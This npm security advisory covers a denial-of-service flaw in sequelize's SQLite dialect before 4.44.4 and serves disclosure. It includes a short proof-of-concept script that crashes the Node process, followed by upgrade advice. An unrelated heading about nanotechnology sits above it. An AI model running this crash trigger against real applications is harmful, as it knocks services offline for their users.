Nanotechnology Promises Much
    Severity: moderate

    Denial of Service

    sequelize

    Overview

    Versions of sequelize prior to 4.44.4 are vulnerable to Denial of Service (DoS). The SQLite dialect fails to catch a TypeError exception for the results variable. The results value may be undefined and trigger the error on a .map call. This may allow attackers to submit malicious input that forces the exception and crashes the Node process.

    The following proof-of-concept crashes the Node process:

    const Sequelize = require('sequelize');
    
    const sequelize = new Sequelize({
        dialect: 'sqlite',
        storage: 'database.sqlite'
    });
    
    const TypeError = sequelize.define('TypeError', {
        name: Sequelize.STRING,
    });
    
    TypeError.sync({force: true}).then(() => {
        return TypeError.create({name: "SELECT tbl_name FROM sqlite_master"});
    });
    

    Remediation

    Upgrade to version 4.44.4 or later.

    Resources

    Have content suggestions? Visit npmjs.com/support.

    Advisory timeline

    1. published

      Advisory Published
      Jan 22nd, 2020
    2. reported

      Reported by Francois Gauthier
      Sep 3rd, 2019